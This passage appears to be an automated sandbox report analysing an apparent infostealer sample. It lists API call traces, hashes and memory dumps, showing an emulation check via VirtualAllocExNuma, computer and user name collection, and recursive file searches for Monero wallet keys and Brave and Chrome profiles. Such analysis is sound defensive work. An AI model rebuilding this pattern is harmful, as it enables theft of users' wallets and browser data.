                                  • Instruction ID: ee1af29facf99da51a96f27f5787391ef39d59b134827603f723b103792538a3
                                  • Opcode Fuzzy Hash: f47545b307b5efd9c85b7ba1c3ff81eb278de6ecbc69601a317453b9b58b6878
                                  • Instruction Fuzzy Hash: 82011DB0D44308FAEF10EBE4CD49BDEBBB8AB14705F20C159E709B62C1DB7459458799
                                  Function 00A71110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00A7112B
                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00A71132
                                  • ExitProcess.KERNEL32 ref: 00A71143
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                  • String ID:
                                  • API String ID: 1103761159-0
                                  • Opcode ID: 166f4319cea3a44ea61be736a17d52a79508e60d876fb93f45e68fa93136ae8f
                                  • Instruction ID: a2c79842eabaa44cbf8f81ce789df42cb833192afc885f29ede8e9fe4a229fe3
                                  • Opcode Fuzzy Hash: 166f4319cea3a44ea61be736a17d52a79508e60d876fb93f45e68fa93136ae8f
                                  • Instruction Fuzzy Hash: 90E01D70A4534CFFE7106BA4DD0EF0D76B8EB04B01F508154F74D7A5D0D6B526419699
                                  Function 00A710A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00A710B3
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00A710F7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Virtual$AllocFree
                                  • String ID:
                                  • API String ID: 2087232378-0
                                  • Opcode ID: 9a4c874cc3a2d7a6d08e6627923060969a0f6e2bde3e37a83d574cf0eefff9f2
                                  • Instruction ID: c1a3ec3a44f7b6b659b2ee13f02c8ce204f1903681571d3e611e6febcdb8ab1f
                                  • Opcode Fuzzy Hash: 9a4c874cc3a2d7a6d08e6627923060969a0f6e2bde3e37a83d574cf0eefff9f2
                                  • Instruction Fuzzy Hash: E1F0E271641308BBE7149BA8AC49FAEB7ECE705B15F304548F544E3280D9729E00CAA0
                                  Function 00A71190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00A878E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A87910
                                    • Part of subcall function 00A878E0: RtlAllocateHeap.NTDLL(00000000), ref: 00A87917
                                    • Part of subcall function 00A878E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00A8792F
                                    • Part of subcall function 00A87850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00A711B7), ref: 00A87880
                                    • Part of subcall function 00A87850: RtlAllocateHeap.NTDLL(00000000), ref: 00A87887
                                    • Part of subcall function 00A87850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00A8789F
                                  • ExitProcess.KERNEL32 ref: 00A711C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                                  • String ID:
                                  • API String ID: 3550813701-0
                                  • Opcode ID: f341f4160a56ca8cfcdf5c598ab918313fd36aed3d57449f62010603627dae96
                                  • Instruction ID: 3875f1dfe5983fdbae57c3e52d2d88f861af13efc708d3567f0db5b071a91a4e
                                  • Opcode Fuzzy Hash: f341f4160a56ca8cfcdf5c598ab918313fd36aed3d57449f62010603627dae96
                                  • Instruction Fuzzy Hash: D0E0C2B291430163CA0037F4AD0AB2E338C5B04385F444628FA08D2142FE29E840C766

                                  Non-executed Functions

                                  Function 00A838B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 00A838CC
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00A838E3
                                  • lstrcat.KERNEL32(?,?), ref: 00A83935
                                  • StrCmpCA.SHLWAPI(?,00A90F70), ref: 00A83947
                                  • StrCmpCA.SHLWAPI(?,00A90F74), ref: 00A8395D
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00A83C67
                                  • FindClose.KERNEL32(000000FF), ref: 00A83C7C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                  • API String ID: 1125553467-2524465048
                                  • Opcode ID: fbca23a20a6b6af1ceb6d04aa25be65dd68230efe0bee379c4bf58e6eac7bb46
                                  • Instruction ID: 2b445fbf5d88d8115179a95f020d6bc779edee06a8fdf512c270d342ac492c9a
                                  • Opcode Fuzzy Hash: fbca23a20a6b6af1ceb6d04aa25be65dd68230efe0bee379c4bf58e6eac7bb46
                                  • Instruction Fuzzy Hash: 6BA131B2A00218ABDF24EF64DD85FEE7378BB58701F044688F64D96141EB759B84CF62
                                  Function 00A7BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A8A920: lstrcpy.KERNEL32(00000000,?), ref: 00A8A972
                                    • Part of subcall function 00A8A920: lstrcat.KERNEL32(00000000), ref: 00A8A982
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00A90B32,00A90B2B,00000000,?,?,?,00A913F4,00A90B2A), ref: 00A7BEF5
                                  • StrCmpCA.SHLWAPI(?,00A913F8), ref: 00A7BF4D
                                  • StrCmpCA.SHLWAPI(?,00A913FC), ref: 00A7BF63
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00A7C7BF
                                  • FindClose.KERNEL32(000000FF), ref: 00A7C7D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                  • API String ID: 3334442632-726946144
                                  • Opcode ID: 53bf9c9941ec0f2d87296a8d2a9ffcd7f9ebbd5141b59cad3c33a403797f9da8
                                  • Instruction ID: 9f02073bed549099e9017fbb6628c22eff8c9c46361d8078e7eb1d6d4ebe23a4
                                  • Opcode Fuzzy Hash: 53bf9c9941ec0f2d87296a8d2a9ffcd7f9ebbd5141b59cad3c33a403797f9da8
                                  • Instruction Fuzzy Hash: A5422B729101046BDF14FB70DE96EED737DAFA4300F408559F50AA6191EF38AB49CBA2
                                  Function 00A84910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 00A8492C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00A84943
                                  • StrCmpCA.SHLWAPI(?,00A90FDC), ref: 00A84971
                                  • StrCmpCA.SHLWAPI(?,00A90FE0), ref: 00A84987
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00A84B7D
                                  • FindClose.KERNEL32(000000FF), ref: 00A84B92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s$%s\%s$%s\*
                                  • API String ID: 180737720-445461498
                                  • Opcode ID: 29bc000fa47fe61c9d7d28c0dccf5522ac1a77b52bb4d5d93d13f937662b1f36
                                  • Instruction ID: 1f4d1be204028744052be61b15c93d229986e0c3cc9f52ba6ffe621d306f79f0
                                  • Opcode Fuzzy Hash: 29bc000fa47fe61c9d7d28c0dccf5522ac1a77b52bb4d5d93d13f937662b1f36
                                  • Instruction Fuzzy Hash: D86167B2900219ABCB24FBA0DC49FEE73BCBB58701F048688F54996141EB75DB45CF91
                                  Function 00A84570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00A84580
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A84587
                                  • wsprintfA.USER32 ref: 00A845A6
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00A845BD
                                  • StrCmpCA.SHLWAPI(?,00A90FC4), ref: 00A845EB
                                  • StrCmpCA.SHLWAPI(?,00A90FC8), ref: 00A84601
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00A8468B
                                  • FindClose.KERNEL32(000000FF), ref: 00A846A0
                                  • lstrcat.KERNEL32(?,0068F500), ref: 00A846C5
                                  • lstrcat.KERNEL32(?,0068DA60), ref: 00A846D8
                                  • lstrlen.KERNEL32(?), ref: 00A846E5
                                  • lstrlen.KERNEL32(?), ref: 00A846F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 671575355-2848263008
                                  • Opcode ID: 7548ef2afb1db810aae427a82bf4abbde57ad37fd2bc3903c53148815166f62d
                                  • Instruction ID: a0561a8659d1e1c280e7ad5e31ffaa502d57e77d8d822d1a509179552148b648
                                  • Opcode Fuzzy Hash: 7548ef2afb1db810aae427a82bf4abbde57ad37fd2bc3903c53148815166f62d
                                  • Instruction Fuzzy Hash: 1F5156B1940218ABCB24FB70DD89FED737CAB58700F404698F64D96190EF759B848F92
                                  Function 00A83EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 00A83EC3
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00A83EDA
                                  • StrCmpCA.SHLWAPI(?,00A90FAC), ref: 00A83F08
                                  • StrCmpCA.SHLWAPI(?,00A90FB0), ref: 00A83F1E
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00A8406C
                                  • FindClose.KERNEL32(000000FF), ref: 00A84081
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 180737720-4073750446
                                  • Opcode ID: efb7b6de6d4cb0d8741d668f9b68669771fb4d9059ad6927189178e631fc5583
                                  • Instruction ID: 63f40866ba8aea0327062351b26d031428d2944217c0944e622e3636a2daf512
                                  • Opcode Fuzzy Hash: efb7b6de6d4cb0d8741d668f9b68669771fb4d9059ad6927189178e631fc5583
                                  • Instruction Fuzzy Hash: B95128B2900218ABCB24FBB0DD45FEE737CBB58700F408699B65996080EB759B858F91
                                  Function 00A7ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 00A7ED3E
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00A7ED55
                                  • StrCmpCA.SHLWAPI(?,00A91538), ref: 00A7EDAB
                                  • StrCmpCA.SHLWAPI(?,00A9153C), ref: 00A7EDC1
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00A7F2AE
                                  • FindClose.KERNEL32(000000FF), ref: 00A7F2C3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\*.*
                                  • API String ID: 180737720-1013718255
                                  • Opcode ID: b7c4be9787416f79ff3b7cbd68a690ec400182a2847246fe3609ba076c024335
                                  • Instruction ID: 9bb892ff3d14f211fe253366a2e95cccc3c8bf5667a2c9efdfd8f44e256ea73f
                                  • Opcode Fuzzy Hash: b7c4be9787416f79ff3b7cbd68a690ec400182a2847246fe3609ba076c024335
                                  • Instruction Fuzzy Hash: B5E1B4729111189AFB55FB60DD52EEE737CAF64300F4045DAB50A62092EF346F8ACF62
                                  Function 00A7F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A8A920: lstrcpy.KERNEL32(00000000,?), ref: 00A8A972
                                    • Part of subcall function 00A8A920: lstrcat.KERNEL32(00000000), ref: 00A8A982
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00A915B8,00A90D96), ref: 00A7F71E
                                  • StrCmpCA.SHLWAPI(?,00A915BC), ref: 00A7F76F
                                  • StrCmpCA.SHLWAPI(?,00A915C0), ref: 00A7F785
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00A7FAB1
                                  • FindClose.KERNEL32(000000FF), ref: 00A7FAC3
                                  Strings
                                  Memory Dump Source
